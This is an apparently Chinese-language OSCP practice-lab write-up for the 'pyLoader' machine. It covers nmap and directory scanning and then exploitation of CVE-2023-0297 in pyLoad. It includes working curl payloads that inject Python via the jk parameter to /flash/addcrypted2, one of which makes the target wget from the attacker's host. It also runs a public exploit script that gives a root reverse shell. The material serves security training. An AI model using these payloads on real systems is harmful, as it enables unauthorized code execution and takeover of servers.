OSCP靶场--pyLoader

OSCP靶场–pyLoader

考点(信息收集+CVE-2023-0297)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV 192.168.178.26 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-28 09:14 EDT
Nmap scan report for 192.168.178.26
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
9666/tcp open  http    CherryPy wsgiserver
| http-title: Login - pyLoad 
|_Requested resource was /login?next=http://192.168.178.26:9666/
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Cheroot/8.6.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.15 seconds

2.user priv

## 目录扫描：
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.26:9666/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.178.26-9666/-_24-03-28_09-49-20.txt

Error Log: /root/.dirsearch/logs/errors-24-03-28_09-49-20.log

Target: http://192.168.178.26:9666/

[09:49:21] Starting: 
[09:55:50] 401 -   25B  - /api/jsonws                                       
[09:55:50] 401 -   25B  - /api/jsonws/invoke                                
[09:55:50] 401 -   25B  - /api/login.json
[09:55:50] 401 -   25B  - /api/swagger-ui.html                              
[09:55:50] 401 -   25B  - /api/swagger.yml
[09:55:50] 401 -   25B  - /api/v1
[09:55:51] 401 -   25B  - /api/v2
[09:55:51] 401 -   25B  - /api/v3
[09:55:51] 401 -   25B  - /api/error_log
[09:55:55] 401 -   25B  - /api/swagger                                      
[09:57:17] 200 -  198B  - /crossdomain.xml                                  
[09:57:23] 302 -  283B  - /dashboard  ->  /login?next=http://192.168.178.26:9666/dashboard
[09:58:16] 302 -  249B  - /favicon.ico  ->  /_themes/modern/img/favicon.ico 
[09:58:19] 302 -  287B  - /filemanager  ->  /login?next=http://192.168.178.26:9666/filemanager
[09:58:20] 302 -  275B  - /files  ->  /login?next=http://192.168.178.26:9666/files
[09:58:22] 308 -  253B  - /flash  ->  http://192.168.178.26:9666/flash/     
[09:58:22] 200 -   13B  - /flash/ZeroClipboard.swf                          
[09:58:23] 200 -   13B  - /flash/                                           
[09:58:45] 302 -  273B  - /home  ->  /login?next=http://192.168.178.26:9666/home
[09:59:11] 302 -  273B  - /info  ->  /login?next=http://192.168.178.26:9666/info
[09:59:44] 200 -   13KB - /login                                             
[09:59:51] 200 -   13KB - /logout                                            
[09:59:51] 302 -  273B  - /logs  ->  /login?next=http://192.168.178.26:9666/logs
[10:02:05] 200 -   25B  - /robots.txt                                        
[10:02:22] 302 -  281B  - /settings  ->  /login?next=http://192.168.178.26:9666/settings
                                                                             
Task Completed


############################  
## searchsploit查找漏洞信息查找不到，所以使用google查找exp信息：
## pyload exploit rce                 
## cve-2023-0297
https://attackerkb.com/topics/4G0gkUrtoR/cve-2023-0297

##############
## 如下响应说明存在漏洞：
┌──(root㉿kali)-[~/Desktop]
└─# curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://192.168.178.26:9666/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 28 Mar 2024 14:12:34 GMT
Server: Cheroot/8.6.0

Could not decrypt key  

################
## 再次验证：
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.26 - - [28/Mar/2024 10:28:48] "GET /test.html HTTP/1.1" 200 -

┌──(root㉿kali)-[~/Desktop]
└─# curl -i -s -k -X $'POST' --data-binary $'jk=pyimport%20os;os.system(\"wget%20http://192.168.45.171/test.html\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' $'http://192.168.178.26:9666/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 28 Mar 2024 14:28:48 GMT
Server: Cheroot/8.6.0

Could not decrypt key    

############################
## 反弹shell:
https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py
##
┌──(root㉿kali)-[~/Desktop]
└─# python3 CVE-2023-0297.py -t http://192.168.178.26:9666/ -I 192.168.45.171 -P 443
[SUCCESS] Running reverse shell. Check your listener!

##############
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.178.26: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.26] 55538
bash: cannot set terminal process group (905): Inappropriate ioctl for device
bash: no job control in this shell
root@pyloader:~/.pyload/data# whoami
whoami
root
root@pyloader:~/.pyload/data# cat /root/proof.txt
cat /root/proof.txt
12d09f5d8d0f3d8ae9f45c1f8123a5f8
root@pyloader:~/.pyload/data# 

主页：测试了sql注入，文件包含，弱密码无果：

查看页面源码：看到可疑的js，进入查看：发现web应用名称

google查找相关漏洞：

检验是否存在漏洞：

反弹shell:

3. root priv

##
https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py

4.总结：